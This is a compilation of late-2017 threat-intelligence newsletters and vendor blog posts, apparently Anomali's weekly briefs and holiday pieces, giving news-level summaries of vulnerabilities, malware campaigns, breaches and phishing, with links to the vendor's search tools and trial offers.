WTB: macOS Exploit Published on the Last Day of 2017

The intelligence in this week’s iteration discuss the following threats: Data leak, Information stealing malware, Malspam, Misconfigured Database, Phishing, RAT, Vulnerabilities, and Zero-day. The IOCs related to these stories are attached to the WTB and can be used to check your logs for potential malicious activity.

Trending Threats

macOS Exploit Published on the Last Day of 2017 (January 2, 2017)
A security researcher going by the alias “Siguza” has released a zero-day vulnerability that affects all versions of the Mac operating system (macOS) since at least 2002. Siguza did not notify Apple prior to publishing a report discussing the vulnerability that affects the “IOHIDFamily” macOS kernel driver. According to Siguza, the vulnerability is a Local Privilege Escalation (LPE) flaw that an actor can only exploit with local access to, or previous malware infection of the affected machine.
Click here for Anomali recommendation

Resume-Themed Malspam Pushing Dreambot Banking Trojan (December 29, 2017)
Researchers have observed a new malspam campaign that is distributing the “Dreambot” banking trojan. In the emails, the actors behind this campaign purport to be sending the recipient a resume to consider. The actors also include “Happy New Year” in the email in an attempt to stay relevant to the current timeframe and to attempt to add legitimacy to the emails. The “resume” attachment is a zip file that, if opened, will extract a JSE file (JScript) and begin the infection process for Dreambot.
Click here for Anomali recommendation

Flaws in Sonos and Bose Smart Speakers Let Hackers Play Pranks on Users (December 27, 2017)
Trend Micro researchers Stephen Hill, has discovered that some “Bose” and “Sonos” smart speakers are affected by vulnerabilities that could allow a threat actor to take over the device. In addition, the vulnerabilities can be exploited by actors who are performing reconnaissance and are trying to gain access to a corporate network, or gather information stored on the device to conduct potentially more effective phishing attacks. Researchers report that the affected smart speakers are “Sonos Play:1” and “Bose SoundTouch,” however, it is possible that more models are also affected.
Click here for Anomali recommendation

Mozilla Releases Security Update for Thunderbird (December 25, 2017)
The United States Computer Emergency Readiness Team (US-CERT) has issued an alert regarding multiple vulnerabilities in Mozilla’s “Thunderbird” platform. Mozilla’s security advisory lists five vulnerabilities that affect Thunderbird 52.5.2. Out of the vulnerabilities, two are listed as critical, two as high, and one as low. Some of the vulnerabilities allow remote code execution.
Click here for Anomali recommendation

Vulnerability Affects Hundreds of Thousands of IoT Devices (December 25, 2017)
Researchers have discovered a vulnerability, registered as “CVE-2017-1756,” in a web server package called “GoAhead” created by the company “Embedthis Software.” GoAhead is located in hundreds of thousands of IoT devices as well as well deployed inside other products such as Comcast, Oracle, and HP, among others. Elttam researchers identified a method in which they could execute malicious code remotely on any device that used the GoAhead web server package.
Click here for Anomali recommendation

Malspam Uses CVE-2017-0199 To Distribute Remcos RAT (December 22, 2017)
Researchers have discovered that threat actors are exploiting the Microsoft Office/WordPad remote code execution vulnerability registered as “CVe-2017-0199” to distribute the “Remcos” Remote Access Trojan (RAT). The malspam emails purport that the attached invoice is incorrect, and requests the recipient to make an amendment so that the sender “Helen Rowe” of “Purchasing Department” can process the payment. The attachment is an RTF file which, if opened, will present a prompt that requests the user to update the document with data from linked files. Clicking yes, and subsequently running the executable will infect the user with Remcos.
Click here for Anomali recommendation

Huawei Home Routers in Botnet Recruitment (December 21, 2017)
An updated variant of the notorious denial-of-service “Mirai” malware called “Satori” is being used to target a zero-day vulnerability in “Huawei” routers, according to Check Point researchers. A threat actor is exploiting a vulnerability, registered as “CVE-2017-17215,” that affects Huawei routers. The threat actor behind this campaign is believe to go under the alias “Nexus Zeta.”
Click here for Anomali recommendation

Digmine Cryptocurrency Miner Spreading via Facebook Messenger (December 21, 2017)
Trend Micro researchers have discovered that threat actors are distributing cryptocurrency miner malware, dubbed “Digimine” via Facebook Messenger. The malware only affects Messenger’s desktop/web browser version on Chrome. Digimine is being propagated to create a cryptocurrency mining botnet installing an auto-start mechanism on infected machines, and then continuing again using Messenger in attempts to infect other machines. Digimine is capable of mining the “Monero” cryptocurrency. The threat actors are sending zip files to their “friends” that will begin the infection process if opened.
Click here for Anomali recommendation

CVE-2017-11882 Exploited to Deliver a Cracked Version of the Loki Infostealer (December 20, 2017)
A new campaign has been found to be delivering a “cracked” version of the “Loki” information stealing malware, according to Trend Micro researchers. Threat actors are using a pirated version of Loki that is being distributed via spam emails that masquerade as an Australian shipping company with an attached receipt. The emails contain a malicious .docx file that then drops a Rich Text Format (RTF) file. The RTF file exploits the Microsoft Office vulnerability registered as “CVE-2017-11882” to download an HTML Application (HTA) dropper that then downloads the Loki payload.
Click here for Anomali recommendation

Home Economics: How Life in 123 Million American Households Was Exposed Online (December 20, 2017)
The UpGuard Cyber Risk Team has discovered that a cloud-based repository belonging to the California-based data analytics firm “Alteryx” was configured for public access. Specifically, the repository was an Amazon Web Services (AWS) S3 cloud storage bucket located on an Alteryx subdomain. The exposed data consists of Personally Identifiable Information (PII) such as financial history and mortgage ownership, in addition to 248 categories of specific data types within the AWS bucket.
Click here for Anomali recommendation

Hidden Backdoor Found In WordPress Captcha Plugin Affects Over 300,000 Sites (December 19, 2017)
Researchers have found that a plugin available for WordPress websites created by the developer “BestWebSoft” was modified by the buyer. The plugin was a Captcha that was modified in such a way that it operated as a backdoor that had the ability to affect approximately 300,000 WordPress websites. An actor could use the backdoor to gain administrator privileges on the affected website.
Click here for Anomali recommendation

Cyberespionage Campaign Sphinx Goes Mobile With AnubisSpy (December 19, 2017)
Trend Micro researchers have discovered malicious applications that made their way into the Google Play store. The applications were identified to contain malware dubbed “AnubisSpy” and are believed to be linked to a cyber espionage campaign called “Sphinx.” Researchers attribute this campaign to the Advanced Persistent Threat group “APT-C-15.” The AnubisSpy malware is capable stealing various forms of data from an infected device in addition to stealing and recording audio.
Click here for Anomali recommendation

TelegramRAT Evades Traditional Defenses via the Cloud (December 18, 2017)
The Remote Access Trojan (RAT) called “TelegramRAT” is being distributed by threat actors via a malicious Microsoft Office document, according to Netskope Threat Research Labs. TelegramRAT exploits the Microsoft vulnerability registered as “CVE-2017-11882.” Additionally, the malicious Office document uses the “Bit.ly” URL shortening service to hide TelegramRAT which is hosted on Dropbox. The RAT uses the messaging service “Telegram’s” BOT API to send and receive commands. TelegramRAT is capable of numerous malicious functions, including stealing various forms of data and deleting evidence of its presence.
Click here for Anomali recommendation

CHM Badness Delivers a Banking Trojan (December 18, 2017)
SpiderLabs researchers have discovered a malspam campaign that is targeting Brazilian institutions with the “Bancos” banking trojan. The threat actors behind this campaign are distributing the trojan via malspam emails that utilize Compiled HTML (CHM) file attachments. This tactic allows actors to conceal malicious downloader code in files and make them more difficult to detect. If the CHM is opened and subsequently decompressed by its default application, “Microsoft Help Viewer”, the HTML objects will run a JavaScript function that begins the Bancos infection process.
Click here for Anomali recommendation

Source: Honeypot Tech

12 Days of Threats

On the first day of Christmas a hacker stole from me,
Thousands in my favorite cryptocurrency…
On the second day of Christmas a hacker stole from me,
Two plain-text passwords and thousands in my favorite cryptocurrency…

We’re sure by now you’ve heard too much Christmas music, so we’ll spare you a full rendition. However, as we approach the end of the year, we’d like to reflect on some of the year’s most notable cyber events.

Freedom Hosting II

Threat description: February 2017 – A first-time hacker from Anonymous took down approximately 20% of all Dark Web traffic this year by breaching Freedom Hosting II (FH2), a Dark Web hosting provider. Anonymous posted messages on all of these sites explaining they did this because FH2 provided services to child pornography and scamming sites. The hackers initially tried to ransom the Freedom Hosting II database for .1 Bitcoin (a little over $100), but later released the information publicly. This information included plain-text emails and passwords, site users, personal information about site administrators, and a write-up of how they breached the systems.

Holiday gift: Bad guys get empty stockings and empty sites


Threat description: February 17th, 2017 – Internet infrastructure and security company Cloudflare wasn’t directly targeted by a malicious attack, but likely felt their fair share of panic this year. A security bug affected Cloudflare’s reverse proxies, unwittingly leaking data from Cloudflare customers to other customers. Personally Identifiable Information (PII) was downloaded by crawlers and users during everyday activity. This data included full https requests and responses, client IP addresses, cookies, and passwords. Tavis Ormandy of Google Project Zero, who first identified the issue, was able to get Cloudflare servers to return private messages from dating sites, full messages from chat services, online hotel bookings, and online password manager data. Cloudflare has since reported on the potential impact of the bug.

Holiday gift: Proof that collaboration can identify and fix issues before a malicious actor takes advantage

Wikileaks CIA Vault 7

Threat description: March 7th, 2017 – This year Wikileaks released thousands of pages of CIA software tool and techniques allegedly created in collaboration with British intelligence. This trove of documents, titled Vault 7, serves as a catalogue of advanced tactics for surveillance and cyber warfare, including how to hack into smartphones, computers, and Internet-connected TVs. The CIA has not confirmed the authenticity of these documents, but officials speaking anonymously have indicated that the information from Vault 7 is genuine. Wikileaks has not identified the source of the information. The existence of such documents is not necessarily surprising, but the scope of tools and procedures is alarming. Instructions are also available for compromising Skype, Wi-Fi networks, docs in PDF formats, commercial antivirus programs, WhatsApp, Signal, and Telegram.

Holiday gift: The CIA is there to listen when we have a long day. Now we can be a good friend and hear a bit about theirs as well.

Shadow Brokers

Threat description: The Shadow Brokers first came to public attention with an announcement on Pastebin.com offering tools stolen from the NSA’s hacking division, officially called Tailored Access Operations and colloquially called the Equation Group. Few people offered to take the bait, so The Shadow Brokers chose to publicly release some of the information – all unredacted. The exploits they have released are older and often already issued patches, but still have significant potential for damage. For example, the NSA backdoor used in the WannaCry ransomware, DOUBLEPULSAR, came from one of the Shadow Brokers’ leaks. As of yet it’s unknown exactly who the Shadow Brokers are.

Holiday gift: Catalogues more interesting than SkyMall.


Threat description: May 12th, 2017 – The WannaCry ransomware outbreak serves as evidence that weapons-grade cyber attacks developed by nation states are now being used for profit. WannaCry was one of the first examples of ransomware that had the ability to spread to other (Windows) computers on its own, similar to malware of the past like Conficker. The ransomware was able to spread on its own by scanning for systems vulnerable to MS17-010, exploiting them, and then using a recently leaked NSA backdoor to install the ransomware on the system. Both the exploit, called ETERNALBLUE, and the backdoor, DOUBLEPULSAR, came from the recent “Lost in Translation” dump leaked by the Shadow Brokers. The United States government has officially blamed North Korea for WannaCry.

Holiday gift: Some tissue for those impacted by WannaCry.


Threat description: June 27th, 2017 – The Petya malware rapidly spread across Europe and North America and infected tens of thousands of systems in more than 65 countries. The Petya ransomware trojan is speculated to be a part of a Ransomware-as-a-Service (RaaS) malware family that was first advertised by Janus Cybercrime Solutions as a RaaS in late 2015. The initial infection vector is believed to be contaminated software updates from Ukrainian financial tech company MeDoc. Anton Geraschenko, an aide to the Ukrainian Interior Minister, has stated that this infection was “the biggest in Ukraine’s history.” The estimated damages associated with NotPetya reached into the millions for companies like French construction group group Saint-Gobain, who lost an estimated $387 million.

Holiday gift: Nothing. Ransomware still sucks 🙁

Hackers Target Nuclear Facilities

Threat description: July 2017 – Critical infrastructure such as nuclear and energy facilities are frequently targeted by advanced persistent threat actors. Early this year the Department of Homeland Security and the Federal Bureau of Investigation released a joint report indicating that companies such as the Wolf Creek Nuclear Operating Corporation had been targeted by hackers. The various attack methods included targeted emails with malicious Word docs, man-in-the-middle attacks (redirecting internet traffic through malicious machines), and watering hole attacks (compromising legitimate websites). Evidence points to Russian hacking group “Energetic Bear” as the culprit. Luckily, no real damage was done.

Holiday gift: Energy sector > energetic adversaries


Threat description: July 2017 – Popular computer platform Ethereum was victim to multiple hacks in 2017. On separate occasions cyber criminals stole > $1 million, $7.4 million, and later $32 million worth of “ether” tokens, the second most widely-used cryptocurrency. For the latter hack, white hat hackers (the good guys) drained $75 million worth of ether from other accounts to protect it from thieves by exploiting the same vulnerability. Ethereum’s problems didn’t end there- a glitch later in the year caused $300 million to be frozen in Parity multi-signature wallets. Parity Technologies suggested a fork (think hard reset) to “unlock” the funds like the one enacted after the DAO hack.

Holiday gift: We’ve identified a better solution than Nutcrackers for a tough nut to crack – white hat hackers.


Threat description: September 2017 – Open-source document database MongoDB had over 27,000 databases wiped and ransomed for their restoration. The targeted databases were running with default settings, making it easy for attackers to find and exploit them. Unfortunately, many of the companies that paid the ransom were never given back their data. Without proper management of permissions and settings, services like MongoDB present an easy opportunity for attackers.

Holiday gift: Security best practices from MongoDB, and a reminder of their importance. This holiday season try to look at security not as the often-ignored fruitcake, but as the delicious frosting keeping your internet gingerbread house together.

Campaign Hacks

Threat description: 2017 – After the direct foreign influence in the 2016 U.S. presidential election, many were left wondering if the numerous European elections of 2017 would encounter the same challenges. In the Netherlands’ March election, concerns over security were so great that every vote was counted by hand. Interior Minister Ronald Plasterk directly cited Russia as a factor in this decision, along with insecure and outdated counting software. The Macron campaign of France, knowing that a targeted attack was inevitable, engaged in a “cyber-blurring” strategy. Fake email accounts were seeded with false documents to slow down hackers. The French government cyber security agency ANSSI later confirmed attacks on the Macron campaign, but did not officially name Russia as the culprit. The German election did not encounter any direct interference, but they did have a bit of a scare – IT specialists Thorsten Schröder, Linus Neumann and Martin Tschirsich analyzed German voting count software and found numerous security flaws. Overall, it appears that most of the elections were carried out relatively unscathed.

Holiday gift: Putin snuck his way onto the nice list last year and got a bald eagle as an early Christmas gift. This year the EU got him for Secret Santa and gave him nada.

Equifax Data Breach

Threat description: September 7th, 2017 – Equifax announced a major data breach to their systems, exposing data associated with approximately 143 million Americans, 400,000 Britons, and 100,000 Canadians. The exposed data contained a host of Personally Identifiable Information (PII), including addresses, Date of Birth (DOB), full names, dispute documents, and of course Social Security Numbers (SSNs). The exploited vulnerability, “CVE-2017-5638,” was issued a patch in March of 2017, which Equifax failed to apply. With half the population of the United States’ information now exposed, many are calling into question the viability of the Social Security Number system. People should keep on alert for fraud.

Holiday gift: Free credit report monitoring from the same company that lost your information in the first place


Threat description: October 24th, 2017 – Yet another large ransomware campaign targeted entities in Russia and Eastern Europe and affected predominantly news and media websites. The initial infection vector was believed to be conducted via compromised Russian websites (drive-by downloads), and a fake Adobe Flash Player installer. The ransomware was able to propagate itself through networks via Server Message Block (SMB). Bad Rabbit bears similarities to the WanaCry and Petya ransomware outbreaks earlier in the year.

Holiday gift: A reminder of the movie Donnie Darko. That’s about it.

Source: Honeypot Tech

Security Worries? Let Policies Automate the Right Thing

By programming ‘good’ cybersecurity practices, organizations can override bad behavior, reduce risk, and improve the bottom line.
Source: Cyber Monitoring

Comprehensive Endpoint Protection Requires the Right Cyber Threat Intelligence

CTI falls into three main categories — tactical, operational, and strategic — and answers questions related to the “who, what, and why” of a cyber attack.
Source: Cyber Monitoring

WTB: New GnatSpy Mobile Malware Family Discovered

This section listed below contains summaries on various threat intelligence stories that occurred during the past week. The intelligence in this week’s iteration discuss the following threats: ATM-theft, Data leak, Malspam, Mobile malware, Phishing, Targeted attacks, Threat group, underground markets, and Vulnerabilities. The IOCs related to these stories are attached to the WTB and can be used to check your logs for potential malicious activity.

Trending Threats

Jack of All Trades (December 18, 2017)
A new mobile malware is targeting Android devices, according to Kaspersky Lab researchers. The malware, called “Loapi,” is being called a “jack of all trades” malware because of the numerous malicious capabilities that have been observed. The modular architecture of the malware allows it to perform different malicious actions such as advertisements, Distributed Denial-of-Service (DDoS) attacks, mine cryptocurrency, send SMS messages, and subscribe to paid services, among others. Researchers note that the modular architecture could allow the actors behind the malware to add new features at any time. The malware was observed to impersonate antivirus and adult-related applications.
Click here for Anomali Recommendation

New GnatSpy Mobile Malware Family Discovered (December 18, 2017)
In early 2017, researchers discovered that a threat group, dubbed “Two-tailed Scorpion/APT-C-23,” was targeting Middle Eastern organizations with the “Vamp” and later on “FrozenCell” malware. Now Trend Micro researchers have discovered a new mobile malware family, dubbed “GnatSpy,” that is believed to be a new variant of “Vamp.” As of this writing, researchers do not know how the threat group is distributing the malware to Android devices. However, it is possible that the actors sent them directly to said devices; researchers note the distribution method is in question because few Android applications were found to contain GnatSpy. The complexity of GnatSpy indicated that the group is increasing their malicious engineering efforts to steal information from Android devices.
Click here for Anomali Recommendation

Microsoft Disables DDE Feature in Word to Prevent Further Malware Attacks (December 15, 2017)
Microsoft has released an Office update that disables the Dynamic Data Exchange (DDE) protocol in Word applications as part of December’s Patch Tuesday. The DDE feature allows an Office application to load data from other applications. DDE has been used by threat actors to distribute malware, and this update is Microsoft’s attempt to help mitigate such malicious activity.
Click here for Anomali Recommendation

Ngay Campaign Rig EK Pushes Quant Loader & Monero CPU Miner (December 14, 2017)
Nao-sec researchers discovered a drive-by download attack campaign, dubbed “ngay,” that appears to be targeting Vietnamese-speaking individuals. The actors behind this campaign previously used drive-by download attacks to redirect website visitors to the “Disdain” Exploit Kit (EK). Researcher identified that this campaign is now using the “RIG” EK to distribute the “Quant” loader malware and a “Monero” cryptocurrency miner.
Click here for Anomali Recommendation

Attackers Deploy New ICS Attack Framework “TRITON” and Cause Operational Disruption to Critical Infrastructure (December 14, 2017)
While responding to a security incident, FireEye Mandiant researchers discovered that an unnamed company was infected with an attack framework malware called “TRITON.” The malware is designed to interact with Triconex Safety Instrumented System (SIS) controllers. Researchers state that TRITON is one of the publicly identified malwares that target Industrial Control Systems (ICS) and is consistent with the “Stuxnet” and “Industroyer” malware. The malware was found on a SIS workstation that ran the Microsoft Windows operating system while impersonating the authentic Triconex Trilog application.
Click here for Anomali Recommendation

Apple Releases Security Updates (December 13, 2017)
The U.S. Computer Emergency Readiness Team (US-CERT) has issued an alert regarding vulnerabilities located in multiple Apple products. The vulnerabilities could be exploited by a remote threat actor to alter the application state iOS and tvOS. Apple’s iCloud for Windows 7.2 is vulnerable to an actor on a privileged network position tracking a user on the same network.
Click here for Anomali Recommendation

WORK Cryptomix Ransomware Variant Released (December 13, 2017)
A new variant of the “Cryptomix” ransomware, dubbed “WORK” because of the .WORK extension appending of the malware, has been discovered in the wild, according to BleepingComputer researchers. This new variant uses the same encryption methods as previous Cryptomix versions, with the change coming in the form of .WORK appended to encrypted files and new emails to contact for the decryption key. While the distribution method of this ransomware has not been reported, malspam is often a common method to distribute malware.
Click here for Anomali Recommendation

The ROBOT Attack (December 12, 2017)
A vulnerability first identified in 1998 by researcher Daniel Bleichenbacher, dubbed “Return Of Bleichenbacher’s Oracle Threat (ROBOT), has resurfaced, according to researchers Hanno Böck and Craig Young. Other researchers believe that this vulnerability is in fact the original “Padding Oracle Attack.” Daniel Bleichenbacher discovered that “the error messages given by SSL server for errors in the PKCS #1 1.5 padding allowed an adaptive-chosen ciphertext attack; this attack fully breaks the confidentiality of TLS when used with RSA encryption.” This vulnerability could allow a threat actor to record Internet traffic and later decrypt it against a vulnerable host that only supports RSA encryption. Researchers found that 27 of the top 100 domains, ranked by Alexa, had vulnerable subdomains.
Click here for Anomali Recommendation

Database of 1.4 Billion Credentials Found on Dark Web (December 11, 2017)
4iQ researchers have discovered a large, interactive database that contains an aggregated list of compromised credentials from approximately 252 previous breaches. The discovery was made on December 5, 2017. The total amount of advertised data consists of usernames and associated, clear text passwords is 1,400,533,869. The structure of the database makes it simply for anyone to download and interact with it, and the search feature is fast enough to return a result in one second. After additional analysis on the data, researchers found that the number of compromised credentials is less because not all of the usernames are listed with an associated password. While some sources state that the data was located on underground forums, and this is likely, the data was also found on open source locations such as “Reddit.”
Click here for Anomali Recommendation

Hacker’s Delight: Mobile Bank App Security Flaw Could Have Smacked Millions (December 11, 2017)
University of Birmingham researchers have published information regarding vulnerabilities located in popular banking applications. The researchers used a custom tool called “Spinner” to conduct semi-automated security tests on 400 applications that heavily rely on security. Through this testing, it was discovered that many banking applications use a technique called “Certificate Pinning” to improve connection security, but use of this technique made it more difficult for penetration testers to find a more serious vulnerability. Researchers found that the vulnerability located in many popular banking applications was that they did not have a proper hostname verification. This flaw could have allowed a threat actor, on the same network of an individual using an affected application, to conduct Man-in-The-Middle (MiTM) attacks to steal user credentials.
Click here for Anomali Recommendation

Phishing Attacks on Bitcoin Wallets Intensify as Price Goes Higher and Higher (December 11, 2017)
With the significant increase in monetary value of the Bitcoin currency, approximately $16,180 USD per bitcoin as of this writing, threat actors are increasing their targeting Bitcoin-related websites and Bitcoin users. In addition to phishing emails, “CheckPhish” researchers also identified five phishing domains targeting the “Blockchain” wallet service. Other security researchers found that the Bitcoin exchange “LocalBitcoins” brand was also used in phishing websites. Threat actors are attempting to steal wallet files and empty accounts of their bitcoins.
Click here for Anomali Recommendation

Hackers Hit U.S., Russian Banks In ATM Robbery Scam: Report (December 11, 2017)
A previously unknown, Russian-speaking threat group, dubbed “MoneyTaker,” is responsible for the theft of approximately $10 million USD from around 18 banks, according to Group-IB researchers. The actors targeted ATMs operated by banks primarily located in the U.S. and Russia. The malicious activity is ongoing and is believed to have begun approximately 18 months ago. Researchers identified that the first attacks took place in the spring of 2016 against banks using the payment technology company “First Data’s” “STAR” network; STAR is a debit card processing and payment network. First Data has stated that “a number” of financial institutions on the STAR network had their credentials for administering debit cards compromised. The actors used custom malware called MoneyTaker, also used for the name of the group, to manipulate payment orders and then use “money mules” to cash out funds from ATMs
Click here for Anomali Recommendation

Observed Threats

This section includes the top threats observed from the Anomali Community user base as well as sensors deployed by Anomali Labs. A ThreatStream account is required to view this section. Click here to request a trial.

Locky Tool Tip
Locky is ransomware that is widely spread via phishing messages. Locky first appeared in early 2016. Locky is strongly correlated with the cyber criminal groups related to the dridex and necurs botnets. Multiple waves of Locky samples are distributed daily. The delivery mechanism has evolved over time. The delivery mechanism has been spam messages with executable attachments, MS Word document attachments using Macros to retrieve then execute Locky, and Zip files that extract JavaScript loaders that retrieve then execute Locky. Hosts compromised by Locky display a ransom-note with instructions on how to decrypt the encrypted files. Encrypted files are renamed .locky or .zepto.
Tags: Locky, Ransomware

Source: Honeypot Tech

[Strategic Security Report] Navigating the Threat Intelligence Maze

Most enterprises are using threat intel services, but many are still figuring out how to use the data they’re collecting. In this Dark Reading survey we give you a look at what they’re doing today – and where they hope to go.
Source: Cyber Monitoring

A Very Malicious Christmas

In 2017, Americans are projected to spend $906 million on gifts, up from $785 in 2016. A significant chunk of that total will be spent online. As consumers turn to the internet, those looking to exploit them are increasing at a similar rate.

Over the last 5 years, the festive season has seen actors ramping up Christmas themed campaigns to directly target businesses and consumers. This post outlines a very small number of particularly prolific attacks that have been observed over previous Christmases that will very likely be seen in reworked variants this year.


View details in ThreatStream: https://ui.threatstream.com/search?status=active&multiSearchResults=true&value__re=.*fastpos.*

Despite the increase in ecommerce transactions, in-person retail sales still account for the largest share of the market. Many consumers don’t think twice when they swipe their credit card or enter their PIN when buying that must-have gift. Unfortunately, some of these people might receive unwelcome expenses on their credit card statements come January if they’ve fallen victim to using a point-of-sale (POS) device infected with malware.

First seen in June 2016, FastPOS is just one piece of malware that targets POS devices. FastPOS, as it is called, is much like other POS families in that it will capture credit data, Track2 and log keystrokes on the infected machine. Notably, the malware communicates with its command and control (C&C) via unencrypted HTTP session. The POS malware establishes persistence much like other malware by creating an auto run key in the Windows registry.

Previously, FastPOS has taken advantage of the increased retail transaction volume in the run-up to Christmas. Various iterations of the FastPOS and other malware families targeting POS systems are likely to follow suit during the 2017 holiday season.

Protip for retailers: search for indicators of compromise (IOCs) tagged with “retail” in ThreatStream to uncover threats to your operations over Christmas.

Lizard Squad

View details in ThreatStream: https://ui.threatstream.com/search?status=active&multiSearchResults=true&value__re=.*lizard%20squad.*

In 2014, Lizard Squad performed a distributed denial-of-service (DDoS) attack against the Xbox Live and Sony Playstation networks over Christmas. As millions (including myself) attempted to play the games they’d just received as gifts they were met with errors. This occurred for the duration of the attack. 

Looking through ThreatStream, Lizard Squad are responsible for a number of attacks, with DDoS being their preferred method. Since the group’s inception they have developed increasingly more sophisticated DDoS capabilities and are now using variations of the botnet malware GafGyt.

Protip for gaming companies: sync indicators of compromise (IOCs) from ThreatStream with your SIEM to automatically match known threats to your logs, and alert when a match has been found.

Merry X-Mas

View details in ThreatStream: https://ui.threatstream.com/search?status=active&multiSearchResults=true&value__re=.*Merry%20Christmas%20Ransomware.*

2017 has been the year of ransomware. From Wanacry to Petya and everything else in between, ransomware has brought havoc to companies around the world. The NotPetya ransomware will reportedly cost shipping giant, Maersk, $300 million alone!

The Merry Christmas (or Merry X-Mas) ransomware was spotted for the first time by security researchers in early January 2017, when the malware was distributed through spam campaigns. According to researchers, the latest strains of the ransomware have been delivered together with other pieces of malware, namely DiamondFox, which is used to steal sensitive information from victims’ systems.

Protip for SecOps teams: be immediately alerted when the latest malware hashes or suspect domain generated algorithms are seen inside your network (including on mobile devices) using Anomali Enterprise.

Phishing for gifts

View search in ThreatStreamhttps://ui.threatstream.com/search?value__re=.*christmas.*

A quick search for malicious domains in ThreatStream turns up hundreds of IOCs with the word “christmas.” Phishing campaigns often ramp up over the festive period, taking advantage of the fact people are spending more money in December. I’ve seen campaigns spoofing retailers and financial institutions in greater number this year than in any previous year I can recall.

Protip for everyone: never click a link in an email. For SecOps teams, monitor emails from compromised addresses or with links to known malicious domains before they’re clicked using Anomali Enterprise.

A few free Christmas gifts from Anomali

STAXX gives you an easy way to access any STIX/TAXII feed and is a great tool for those starting to incorporate threat intelligence into their security strategies. 

You can download STAXX for free here — our gift to you this Christmas.

Understand your security risk posture with a free customized Recon Report from Anomali Labs. Simply sign up for a free Anomali Enterprise Trial in the month of December.

A December to Remember

Source: Honeypot Tech

WTB: German Spy Agency Warns of Chinese LinkedIn Espionage

The intelligence in this week’s iteration discuss the following threats: APT, Banking trojan, Botnet, Data leak, Malspam, Malvertising, Pre-installed keylogger, Ransomware, Targeted attacks, Vulnerabilities. The IOCs related to these stories are attached to the WTB and can be used to check your logs for potential malicious activity.

Trending Threats

German Spy Agency Warns of Chinese LinkedIn Espionage (December 10, 2017)
The German intelligence agency, the Federal Office for the Protection of the Constitution (BfV), has stated that Chinese intelligence is using the networking website “LinkedIn” to target approximately 10,000 Germans. The BfV released information regarding multiple fake LinkedIn profiles it discovered and believes that the accounts are evidence of China’s efforts to spy on, and possibly recruit German individuals and subvert German politics.
Tags: Targeted attacks, LinkedIn
Click here for Anomali Recommendation

Pre-Installed Keylogger Found On Over 460 HP Laptop Models (December 8, 2017)
A security researcher going by the name “ZwClose” has released information regarding a pre-installed keylogger located in the “Synaptics” touchpad driver. The Synaptics driver is shipped with HP machines, and approximately 460 HP models were observed to contain this keylogging feature. Researchers note that the keylogger feature is disabled by default, however, threat actors could use open source tools for bypassing the User Account Control to enabled the keylogger “by setting a registry value.”
Tags: Pre-Installed threat, Keylogger, HP
Click here for Anomali Recommendation

A Peculiar Case of Orcus RAT Targeting Bitcoin Investors (December 7, 2017)
As the value of the “Bitcoin” cryptocurrency continues to increase (approximately $17,740 USD as of this writing) threat actors are subsequently increasing their efforts to target Bitcoin investors. Fortinet researchers have found that actors are targeting Bitcoin investors with a Remote Access Trojan (RAT) called “Orcus” via a phishing campaign. The phishing emails purport to be an announcement of a new, legitimate bitcoin trading bot called “Gunbot.” The email attachment contains a VB script that, when executed, will download a file impersonating a .jpeg. The .jpeg file is actually a portable executable binary file. The executable was found to be a trojanized version of an open source inventory tool called “TTJ-Inventory System.” Inside this malicious versions, researcher discovered the presence of the “Orcus” RAT, which is advertised as a Remote Access Tool created by Orcus Technologies. Orcus has numerous features and commands that it can run, however, researcher note that what separates Orcus is the ability to load custom plugins.
Tags: Targeted attacks, Bitcoin investors, Malspam, Orcus RAT
Click here for Anomali Recommendation

New Targeted Attack in the Middle East by APT34, A Suspected Iranian Threat Group, Using CVE-2017-11882 (December 7, 2017)
FireEye researchers have published a report regarding a new Advanced Persistent Threat (APT) group they have dubbed “APT34.” The group is believed to be based in Iran, and has been observed exploiting a Microsoft Office vulnerability (CVE-2017-11882) that Microsoft patched on November 14, 2017. The vulnerability was exploited while attacking an unnamed government organization in the Middle East. Researchers believe that the APT group has been conducting a long-term cyber espionage campaign to benefit Iranian national interests. The group is believed to have been active since at least 2014. The group was observed using spear phishing emails that attempt to drop public and custom malicious tools, such as the group’s custom PowerShell backdoor to achieve its goals.
Tags: APT, APT34, Targeted attacks
Click here for Anomali Recommendation

Master Channel: The Boleto Mestra Campaign Targets Brazil (December 7, 2017)
Palo Alto Unit 42 researchers have discovered a new malspam campaign, dubbed “The Boleto Mestre Campaign” because the links and attachments in the emails masquerade as “Boleto Bancário.” Boleto Bancário is an official payment method that is regulated by the Central Bank of Brazil. Researchers have observed over 260,000 emails that fall under this theme since June 2017. The objective of this campaign is trick a user into following a malicious link or open a document that will infect the recipient with an information stealing trojan.
Tags: Malspam, Boleto Bancario-themed, Data theft
Click here for Anomali Recommendation

Mailsploit: It’s 2017, and You Can Spoof The “From” in Email to Fool Filters (December 6, 2017)
Penetration tester, Sabri Haddouche, has discovered that more than 30 email clients are vulnerable to email source spoofing. The vulnerability has been dubbed “Mailsploit.” The email clients are vulnerable to spoofing because of improper implementation of the Request For Comments (RFC) 1342 (which dates back to 1992) that can allow source spoofing to bypass spam filters and security features such as Domain-based Message Authentication, Reporting and Conformance (DMARC). RFC 1342 has to do with the representation of non-ASCII character in Internet message headers. Haddouche identified that the mail client interfaces do not properly sanitize a non-ASCII string after it is decoded.
Tags: Vulnerability, Mailsploit, Email clients
Click here for Anomali Recommendation

StorageCrypt Ransomware Infecting NAS Devices Using SambaCry (December 5, 2017)
A new ransomware, dubbed “StorageCrypt,” is targeting Network-Attached Storage (NAS) devices, according to Bleeping Computer researchers. The threat actors behind this campaign are using the Linux Samba vulnerability “SambaCry,” Samba is a Windows suite of programs for Linux and Unix. Exploitation of the vulnerability allows an actor to open a command shell on the affected machine that can be used to download file and execute commands. The actors are demanding a ransom from anywhere between 0.4 (approximately $6,356 USD) to 2 (approximately $31,779 USD) bitcoins for the decryption key.
Tags: Ransomware, StorageCrypt, Vulnerability, SambaCry
Click here for Anomali Recommendation

Quantize or Capitalize (December 5, 2017)
Forcepoint researchers have found that the “Quant” trojan loader, usually used to distribute “Locky” ransomware and the information stealing malware “Pony,” has added new features to its malicious capabilities. Quant is now able to steal credentials as well as various cryptocurrencies including Bitcoin, Peercoin, Primecoin, and Terracoin. The credential stealing feature is accomplished via the Delphi based library that is capable of stealing operating systems and application login credentials.
Tags: Malware, Downloader, Quant, Credential theft
Click here for Anomali Recommendation

Virtual Keyboard Developer Leaked 31 Million of Client Records (December 5, 2017)
